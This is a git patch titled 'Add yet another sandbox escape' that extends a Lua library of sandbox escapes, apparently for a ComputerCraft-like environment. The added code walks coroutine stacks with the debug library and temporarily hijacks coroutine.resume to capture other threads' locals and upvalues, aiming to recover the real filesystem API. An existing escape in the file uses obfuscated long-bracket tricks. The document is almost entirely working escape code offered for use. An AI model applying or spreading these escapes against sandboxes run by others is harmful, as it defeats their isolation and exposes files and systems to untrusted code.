From 1e69bebcf56289425d67f1e8a71d381bcb891b2e Mon Sep 17 00:00:00 2001
From: 6_4 <owing_piker.0p@icloud.com>
Date: Tue, 16 Jul 2024 01:40:51 -0400
Subject: [PATCH] Add yet another sandbox escape

---
 src/lib/sandboxescapes.lua | 42 +++++++++++++++++++++++++++++++++++++-
 1 file changed, 41 insertions(+), 1 deletion(-)

diff --git a/src/lib/sandboxescapes.lua b/src/lib/sandboxescapes.lua
index 760559e..801ccca 100644
--- a/src/lib/sandboxescapes.lua
+++ b/src/lib/sandboxescapes.lua
@@ -43,6 +43,25 @@ local function scan_environment(fn)
     if is_probably_filesystem(k) then return k end
 end
 
+local function scan_stack(thread)
+    local level = 1
+    while debug.getinfo(thread, level) do
+        local index = 1
+        repeat
+            local name, value = debug.getlocal(thread, level, index)
+            if is_probably_filesystem(value) then return value end
+            if type(value) == "function" then
+                local ok, value = pcall(harvest_upvalues, value)
+                if ok and value then return value end
+                ok, value = pcall(scan_environment, value)
+                if ok and value then return value end
+            end
+            index = index + 1
+        until not name
+        level = level + 1
+    end
+end
+
 local escapes = {
     load_env = function()
         local k = dgetfenv(load("")).fs
@@ -59,7 +78,6 @@ local escapes = {
         [=[]=]end),_]=======][=[==]=]})
         [#[=======[==]=======]]return _
         ]=================][===[==]===]
-        
         if is_probably_filesystem(k) then return k end
     end,
     getfenv = function()
@@ -91,6 +109,28 @@ local escapes = {
             end
             i = i + 1
         end
+    end,
+    scan_most_threads = function()  
+        if not debug then return end
+        if not (debug.getinfo and debug.getlocal) then return end
+        local running = coroutine.running()
+        local threads_to_scan = {}
+        local old_resume = coroutine.resume
+        coroutine.resume = function(...)
+            threads_to_scan[coroutine.running()] = true
+            threads_to_scan[...] = true
+            if ... == running then
+                coroutine.resume = old_resume
+            end
+            return old_resume(...)
+        end
+        sleep(0)
+        for thread, _ in pairs(threads_to_scan) do
+            if type(thread) == "thread" then
+                local ok, value = pcall(scan_stack, thread)
+                if ok and value then return value end
+            end
+        end
     end
 }